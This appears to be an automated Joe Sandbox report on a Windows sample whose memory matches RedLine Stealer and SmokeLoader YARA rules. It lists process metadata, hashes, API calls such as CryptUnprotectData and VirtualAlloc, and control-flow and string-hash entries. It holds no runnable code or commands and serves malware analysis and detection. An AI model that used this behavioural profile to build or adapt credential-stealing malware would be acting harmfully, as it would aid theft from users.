                                                                            Path:C:\Users\user\Desktop\rdFy6abQ61.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\rdFy6abQ61.exe"
                                                                            Imagebase:0x400000
                                                                            File size:324'096 bytes
                                                                            MD5 hash:7A3E26158D0BF299838749875FEB6232
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:09:32:02
                                                                            Start date:04/01/2025
                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1856
                                                                            Imagebase:0x940000
                                                                            File size:483'680 bytes
                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true


                                                                              Execution Graph

                                                                              Execution Coverage:2.9%
                                                                              Dynamic/Decrypted Code Coverage:22.3%
                                                                              Signature Coverage:50.8%
                                                                              Total number of Nodes:130
                                                                              Total number of Limit Nodes:12

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CoCreateInstance.OLE32(80838290,00000000,00000001,?,00000000), ref: 0043D572
                                                                              • SysAllocString.OLEAUT32 ref: 0043D608
                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043D646
                                                                              • SysAllocString.OLEAUT32 ref: 0043D6A8
                                                                              • SysAllocString.OLEAUT32 ref: 0043D765
                                                                              • VariantInit.OLEAUT32(?), ref: 0043D7D6
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0043DB5D
                                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043DB95
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
                                                                              • String ID: fF$CfF$[B$[J$tu$yv${pqv
                                                                              • API String ID: 505850577-1972840126
                                                                              • Opcode ID: 0933b6900e20eb3ffd80477a97ad3530cb39ed5c2e1d64840ee4302b7984fe47
                                                                              • Instruction ID: dd13a90e2492ac68040bcad17eea3e7c9d23fbfdc89757e028f71a1dea91b727
                                                                              • Opcode Fuzzy Hash: 0933b6900e20eb3ffd80477a97ad3530cb39ed5c2e1d64840ee4302b7984fe47
                                                                              • Instruction Fuzzy Hash: 94621372A183108FE314CF68D88576BBBE1EFD5314F198A2DE4D58B390D7799809CB86

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID: !@$,$0$6$p$q$v
                                                                              • API String ID: 1279760036-585546663
                                                                              • Opcode ID: 68ded5a1127ff787cf997603004e9156167bbfc9199ee1ec6ad3b0f1b8bf95cb
                                                                              • Instruction ID: 8656d014051cfeae6f38fc6e5bc27d53fcdcc23dc9b32e8d9396b3c6709607b7
                                                                              • Opcode Fuzzy Hash: 68ded5a1127ff787cf997603004e9156167bbfc9199ee1ec6ad3b0f1b8bf95cb
                                                                              • Instruction Fuzzy Hash: 0122DD7170C790CFD3248B28D58036BBBE1BB95324F558A2EE5E9873D1D7B988418B4B

                                                                              Control-flow Graph
                                                                              • Function at 408a60; calls GetCurrentProcessId, GetCurrentThreadId, SHGetSpecialFolderPathW, GetForegroundWindow and ExitProcess, plus internal calls to 4416b0, 43a2c0, 442000, 4404b0, 40a170, 40d400, 40c050 and 408280. The executed/not-executed node legend and the raw edge list of the rendered graph are not reproduced.
                                                                              APIs
                                                                              • GetCurrentProcessId.KERNEL32 ref: 00408A84
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00408A8E
                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408B76
                                                                              • GetForegroundWindow.USER32 ref: 00408B8B
                                                                              • ExitProcess.KERNEL32 ref: 00408D07
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                              • String ID:
                                                                              • API String ID: 4063528623-0
                                                                              • Opcode ID: ba99a32a84df6074fc1a326d170a01607909a1aa19cc5cd935f515b9d2d4cca7
                                                                              • Instruction ID: 695b1043c619777a8863990e744e8888075fa37916c6100b3e536846f602c71f
                                                                              • Opcode Fuzzy Hash: ba99a32a84df6074fc1a326d170a01607909a1aa19cc5cd935f515b9d2d4cca7
                                                                              • Instruction Fuzzy Hash: E3616873B143140BD318AE799C1635AB6D39BC5314F0F863EA995EB7D1ED7888068389

                                                                              Control-flow Graph
                                                                              • Function at 40c080; four basic blocks (40c080-40c2df, 40c2e0-40c315 with a self-loop, 40c317-40c323, 40c326-40c343) and no calls. The executed/not-executed node legend and the raw edge list of the rendered graph are not reproduced.
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 50$DM_e$FwPq$Js$'!
                                                                              • API String ID: 0-1711485358
                                                                              • Opcode ID: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
                                                                              • Instruction ID: a29f9b67a002a0f45ebf0d2c5d73cf8b9506a9b5be0e3ba76b97c1ae1caaee17
                                                                              • Opcode Fuzzy Hash: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
                                                                              • Instruction Fuzzy Hash: C751DAB45493808FE334CF21C991B8BBBB1BBA1304F609A0CE6D95B654CB759446CF97

                                                                              Control-flow Graph
                                                                              • Function at 418ba2; internal calls to 401dd0, 408280, 401f60, 41bdd0, 401e00, 401df0, 408270, 40aff0 and 445260, no Win32 API calls. The executed/not-executed node legend and the raw edge list of the rendered graph are not reproduced.
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: PWPQ$bd\,$fnga$oQ
                                                                              • API String ID: 0-3706350231
                                                                              • Opcode ID: fe0c42c07420c9bbc5d61f49a80fd29d9882301a9105f023342265155b572c4c
                                                                              • Instruction ID: e34152e6636813154928bb160b9fd2834c9c91dba41fdab838839377217cf8bd
                                                                              • Opcode Fuzzy Hash: fe0c42c07420c9bbc5d61f49a80fd29d9882301a9105f023342265155b572c4c
                                                                              • Instruction Fuzzy Hash: 1CC126766083408FD7258F24C8557AB77E6EFC6314F08892EE8998B391EF388841C787

                                                                              Control-flow Graph
                                                                              • Function at 422370; internal calls to 441650, 443b60, 408270, 408280 and 4219a0, no Win32 API calls. The executed/not-executed node legend and the raw edge list of the rendered graph are not reproduced.
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: -jkhanold~m`$anold~m`$d~m`
                                                                              • API String ID: 0-185452761
                                                                              • Opcode ID: d49d82f6dee0b69ccdeb9ac9c72559ba4ec1d23df509649ca449329d3e76b77d
                                                                              • Instruction ID: c4d8edb6bc4b196318c262ba746bf01715a487006edf2819d48878c0ea44a364
                                                                              • Opcode Fuzzy Hash: d49d82f6dee0b69ccdeb9ac9c72559ba4ec1d23df509649ca449329d3e76b77d
                                                                              • Instruction Fuzzy Hash: C8D1BBB06083509FD710DF68D892B6BBBE0FF85318F54491DE8958B392E7B8D809CB56

                                                                              Control-flow Graph
                                                                              • Function at 5e07a6; calls CreateToolhelp32Snapshot and Module32First, plus an internal call to 5e0465. The executed/not-executed node legend and the raw edge list of the rendered graph are not reproduced.
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005E07CE
                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 005E07EE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_5e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                              • String ID:
                                                                              • API String ID: 3833638111-0
                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                              • Instruction ID: f7a6780e9fa88dfbf35f1815424aa3f9e674ffdcbdbb02a1b37934ab44102016
                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                              • Instruction Fuzzy Hash: 7EF062311017116BD7243BB6A88DA6F7AE8FF49765F101528E682910C0DAB0F8864A61

                                                                              Control-flow Graph
                                                                              • Function at 415d89; calls CryptUnprotectData, plus internal calls to 408270, 443b60 and 41d040. The executed/not-executed node legend and the raw edge list of the rendered graph are not reproduced.
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: dbee84ecd3790633f2c83826065bd30b531f242f0a5518141b0bd449406d4866
                                                                              • Instruction ID: fe71d1bcebcc68b075db47888e1e2cba677fa4d5c187ad294acff22be9a80e62
                                                                              • Opcode Fuzzy Hash: dbee84ecd3790633f2c83826065bd30b531f242f0a5518141b0bd449406d4866
                                                                              • Instruction Fuzzy Hash: 1B51B9B16086428FC714CF58C4917ABF7E2ABD5304F18892EE4EA87342E739DD45CB86
                                                                              APIs
                                                                              • LdrInitializeThunk.NTDLL(0044523A,00000002,00000018,?,?,00000018,?,?,?), ref: 004420AE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 301V
                                                                              • API String ID: 0-2749669040
                                                                              • Opcode ID: 833df5a93a9dfcddf4f429d08c48422bb21d6f1f0a3d624069caf29e04340d04
                                                                              • Instruction ID: baf02472d42b1fd34baef0eca44314001f1f1136a433d7a2becac9f4216ef3dd
                                                                              • Opcode Fuzzy Hash: 833df5a93a9dfcddf4f429d08c48422bb21d6f1f0a3d624069caf29e04340d04
                                                                              • Instruction Fuzzy Hash: 6741BE742483118BD714DF54C8A4B6BB7F1FFC5308F08892DE4865B395E7B99608DB8A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4c5a90b9fb371d52f131ad3a9995dc80354c686060061162c2bdec51d185e8da
                                                                              • Instruction ID: 01036c0abe53894f00a23a0b33865d1644de07ddd8768e0b6d49d0c725de61cd
                                                                              • Opcode Fuzzy Hash: 4c5a90b9fb371d52f131ad3a9995dc80354c686060061162c2bdec51d185e8da
                                                                              • Instruction Fuzzy Hash: 0F4100BA4583028BD314CF51D89035BFAE3ABC5308F19CA2DE4C95B344DAB9C5098B96
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 136ff0709e28839b269720e4fb839b7b46befae130c92130e2f97ddf8959a9d5
                                                                              • Instruction ID: d294dc39abdefed7299eeb113bd94dd65164e84cb7974bfe8d228d73c8c27ee3
                                                                              • Opcode Fuzzy Hash: 136ff0709e28839b269720e4fb839b7b46befae130c92130e2f97ddf8959a9d5
                                                                              • Instruction Fuzzy Hash: 1911D0792593018BD308CF55DC9136BFBE3ABC6348F19C92DE18557355CAB8C106CB5A

                                                                              Control-flow Graph
                                                                              • Function at 20e003c; calls VirtualAlloc, VirtualProtect, VirtualFree and LoadLibraryA (twice), plus internal calls to 20e0a3f, 20e0e0f, 20e0d90, 20e0a69, 20e0cce and 20e0ce7. The executed/not-executed node legend and the raw edge list of the rendered graph are not reproduced.
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 020E024D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: eb0f242f5703443693c8639c26dcadd2eec8494b01d7f8affdc10406fa1bd32a
• Instruction Fuzzy Hash: 57527A75A01229DFDBA4CF58C984BACBBB1BF09304F1480D9E54EAB351DB70AA85DF14
Control-flow Graph
APIs
• GetForegroundWindow.USER32 ref: 004423C5
• GetForegroundWindow.USER32 ref: 004423E0
Memory Dump Source
• Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
• Opcode ID: ea1af17a4c87661e7e22aa3b412247517447923eaeb0832990aa116f906f78b1
• Instruction ID: 3f5cde6939bccaa2b971e6e0c262a6c41a2af89a1d69f81b939c4d59ebd80ce7
• Instruction Fuzzy Hash: D3D0A7BDD114104BB2559720BC0E45F36119B9B20A304443CE4070121BEA35118E868E
Control-flow Graph
APIs
• SetErrorMode.KERNELBASE(00000400,?,?,020E0223,?,?), ref: 020E0E19
• SetErrorMode.KERNELBASE(00000000,?,?,020E0223,?,?), ref: 020E0E1E
Memory Dump Source
• Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction ID: 1f3fb47f01235a72a762d1c9d8ab3db6e6df8a0f8847510d0ea92dc2c2c9df9a
• Instruction Fuzzy Hash: A7D0123114522877DB413A94DC09BCD7B5CDF05B66F008021FB0DE9180C7B0954046E5
APIs
• CoInitializeEx.COMBASE(00000000,00000002), ref: 0040D413
Memory Dump Source
• Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: b103da860b07b6caeef7231849386c8b9813f2fcc2fc8537c1924e67a92246bd
• Instruction ID: 5b8c1c1c38bc235c753b9088e917c06d101502a7d4806eff28edba5b46e46085
• Instruction Fuzzy Hash: 32D05E7565014477D2146B18EC47F563658970375AF000229F663C65D1D910A915E569
APIs
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D445
Memory Dump Source
• Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
Similarity
• API ID: InitializeSecurity
• String ID:
• API String ID: 640775948-0
• Opcode ID: 08574d9084c9b59a9be89533cd06f00eba31ac9089c6781083e346e8ebf9aaa5
• Instruction ID: f87055a7ed73e73a39e7b0bf2bc1a884afc0d8708234b3b1202e7b1dbc502a37
• Instruction Fuzzy Hash: 52D0C9787D8305B7F6685B18EC17F1632505306F61F340229B366FF6D0C9D07901961C
APIs
• RtlFreeHeap.NTDLL(?,00000000), ref: 004404FD
Memory Dump Source
• Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: ffaa9ae7a0f019c742f1804f8799764577334675712f88277fcdd572fe457cd5
• Instruction ID: e6622cb3e0fd9e941ff1a23b217b6006838c210e8ccdd082eec4ddb73310e109
• Instruction Fuzzy Hash: 4AC08C31504922EBC7102F28BC16BC63A14EF02762F0748B1F000A90B5C728EC91C9D8
APIs
• RtlAllocateHeap.NTDLL(?,00000000,?,00000001,00408C27,FDFCE302), ref: 004404C0
Memory Dump Source
• Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 1b7010b4c8090af6c82bcce16cf64795d3be7dfa4a7c6d6e8218ea40ee4cb554
• Instruction ID: a3e7d273c8645b615fb13e0d68042f64d6ea605513032f2b713a79b74872f641
• Instruction Fuzzy Hash: CFC04871045220ABDA502B25EC09BCA3A68AF46662F0280A6B044A70B2C760AC82CA98
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005E04B6
Memory Dump Source
• Source File: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5e0000_rdFy6abQ61.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: 182139110b15671e2c3502b1b8a70a5972b767e38117f894c30218d15a7a9ed9
• Instruction Fuzzy Hash: A3112079A40208EFDB01DF99C985E98BFF5AF08351F058094F9489B361D371EA90DF40
Strings
Memory Dump Source
• Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
Similarity
• API ID:
• String ID: $ ]ZN$ ]ZN$ ]ZN$!$!$"$"$$$$$$$%$&$'$'$($($*$+$+$,$-$.$.$0$0$1$1$2$3$4$4$6$6$6$8$8$9$:$:$<$=$>$@$@$A$B$B$D$D$D$D$E$F$H$J$J$L$L$L$M$N$N$N$P$Q$R$R$S$T$T$V$W$X$Z$\$^$`$a$b$d$e$f$f$m$p$p$q$q$r$t$v$v$w$w$x$y$z$z$|$~
• API String ID: 0-299570860
• Opcode ID: f5b952a7fa576cf3fac9bc8395e035e8ba89dd158049201593eea142aec36e13
• Instruction ID: 11c8b48c8f4a98f758d37e8cd5808665052ec381988852a9cf89f45dba9536ca
• Instruction Fuzzy Hash: CF03B07010C7C08AD3259B38C5883EFBFD1AB96314F188A6EE5E9873D2D7798585871B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
Yara matches
Similarity
• API ID:
• String ID: $ ]ZN$ ]ZN$ ]ZN$!$!$"$"$$$$$$$%$&$'$'$($($*$+$+$,$-$.$.$0$0$1$1$2$3$4$4$6$6$6$8$8$9$:$:$<$=$>$@$@$A$B$B$D$D$D$D$E$F$H$J$J$L$L$L$M$N$N$N$P$Q$R$R$S$T$T$V$W$X$Z$\$^$`$a$b$d$e$f$f$m$p$p$q$q$r$t$v$v$w$w$x$y$z$z$|$~
• API String ID: 0-299570860
• Opcode ID: 25a80902b9933ed18a7334007feda52168da80d7d92116ce929127663f5e30fb
• Instruction ID: 4a62a5c16a190828ada162cb4206e03a4d0e19ded930cb87405c3e3271053563
• Instruction Fuzzy Hash: E903DE7014C7C08ED3A59B38C8883AFBBD1AB96324F088A6DD6D9877D2D7798145DB13
Strings
Memory Dump Source
• Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
Similarity
• API ID:
• String ID: !$&$'$($($*$.$/$4$4$6$7$9$:$<$>$?$?$?$?$B$C$C$D$D$E$F$F$G$G$H$I$J$L$L$L$L$L$N$P$Q$R$S$S$S$T$U$V$X$Z$Z$[$[$\$]$`$b$c$c$c$d$d$e$g$g$g$h$h$i$i$k$k$k$l$o$p$p$q$q$s$t$t$u$u$u$v$w$x$y$z${${${$|$|$}$~$~
• API String ID: 0-1873956536
• Opcode ID: fc18553a73c8fd4dc2fea3a9f9035c4283c881730360b760b769bf46582e99ae
• Instruction ID: 931559f782a0dae5da6d3a2348cda9da3af0ea84656c223040a8e2c7efec153d
• Instruction Fuzzy Hash: DAB28F3160C7C08BD325DA38C85439FBBD1ABD6324F184A6DE8E98B3C2D6799849C757
Strings
Memory Dump Source
• Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
Yara matches
Similarity
• API ID:
• String ID: !$&$'$($($*$.$/$4$4$6$7$9$:$<$>$?$?$?$?$B$C$C$D$D$E$F$F$G$G$H$I$J$L$L$L$L$L$N$P$Q$R$S$S$S$T$U$V$X$Z$Z$[$[$\$]$`$b$c$c$c$d$d$e$g$g$g$h$h$i$i$k$k$k$l$o$p$p$q$q$s$t$t$u$u$u$v$w$x$y$z${${${$|$|$}$~$~
• API String ID: 0-1873956536
• Opcode ID: 956e5634ba402c0b98be263ec24341df1d894c542c900cdbbef8950896477da6
• Instruction ID: 848438288a82550640ef5fc412e664985f3ca6f232ab9041199f170ecd12db88
• Instruction Fuzzy Hash: B8B2AD3160C3C08FD365CA28C85439EBBD2ABD6324F084A6DE5E98B7D1D7B99809D753
Strings
Memory Dump Source
• Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
Similarity
• API ID:
• String ID: F;D$zx$'Y<[$(]2_$2U/W$2{<u$3416$3416$6fd$7J0H$7w$:vt$N>_<$SP$Ta\c$Teg$Vt%t$Z[$bxB$qVol$s@qF$wDuJ${HyN$jh$nl$zx
• API String ID: 0-2025997952
• Opcode ID: d34ec39eb96bb7efa42d43d0cecc10ce8a4047bc9737a28ca6cdc305126fa738
• Instruction ID: 8ebcec6048e81b7414bf2c44ea1e9f7dace67e943cef4cf10300ed7be7304af5
• Instruction Fuzzy Hash: D1B273B160C3918BD334CF14D8417ABBBF2FB95304F44892DD4C99B252D7798A4ADB8A
APIs
• CoCreateInstance.COMBASE(80838290,00000000,00000001,?,00000000), ref: 0211D7D9
• SysAllocString.OLEAUT32 ref: 0211D86F
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0211D8AD
• SysAllocString.OLEAUT32 ref: 0211D90F
• SysAllocString.OLEAUT32 ref: 0211D9CC
• VariantInit.OLEAUT32(?), ref: 0211DA3D
• SysFreeString.OLEAUT32(00000000), ref: 0211DDC4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
Yara matches
Similarity
• API ID: String$Alloc$BlanketCreateFreeInitInstanceProxyVariant
• String ID: fF$CfF$[B$[J$tu$yv${pqv
• API String ID: 2895375541-1972840126
